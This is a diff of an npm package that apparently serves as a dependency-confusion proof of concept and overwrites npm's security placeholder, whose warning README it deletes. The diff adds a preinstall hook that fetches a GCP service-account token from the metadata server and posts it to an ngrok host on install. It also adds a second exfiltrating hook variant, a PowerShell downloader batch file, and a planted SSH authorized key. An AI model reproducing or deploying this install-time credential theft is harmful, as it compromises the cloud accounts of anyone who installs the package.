package/.ssh/authorized_keys ADDED
@@ -0,0 +1 @@
1
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure
package/.ssh/known_hosts ADDED
@@ -0,0 +1 @@
1
+ |1|hAkID7hatXT1a6M7ajlyZPpSkF8=|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe
package/.sudo_as_admin_successful ADDED
File without changes
package/base.ldif ADDED
@@ -0,0 +1,13 @@
1
+ dn: dc=ldap,dc=example,dc=com
2
+ objectClass: top
3
+ objectClass: dcObject
4
+ objectClass: organization
5
+ o: Example LDAP Organization
6
+ dc: ldap
7
+
8
+ dn: cn=admin,ldap,dc=example,dc=com
9
+ objectClass: simpleSecurityObject
10
+ objectClass: organizationalRole
11
+ cn: admin
12
+ description: Directory Administrator
13
+ userPassword: {SSHA}your_encrypted_password
package/exploit.bat ADDED
@@ -0,0 +1 @@
1
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"
package/exploit.txt ADDED
@@ -0,0 +1,26 @@
1
+ This file is a "malicious" file
2
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
4
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
5
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
6
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
7
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
8
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
9
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
10
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
11
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
12
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
13
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
14
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
15
+ ⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
16
+ ⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
17
+ ⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
18
+ ⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
19
+ ⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
20
+ ⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
21
+ ⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
22
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
23
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
24
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
25
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
26
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
- "name": "myconfusedfunctionpoctestpackage",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
2
+ "name": "myconfusedfunctionpoctestpackage",
3
+ "version": "1.4.8",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo 'testa'",
8
+ "preinstall": "curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/cloud-build-account@gcp-gcpretlab-nprd-95021.iam.gserviceaccount.com/token' | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://f1c6-34-168-173-48.ngrok-free.app"
9
+ },
10
+ "author": "me",
11
+ "license": "ISC"
6
12
  }
package/package.json.save ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "mygcpconfusedfunctionpocmaliciouspackage",
3
+ "version": "1.1.1",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo 'testa'",
8
+ "preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
9
+ },
10
+ "author": "me",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.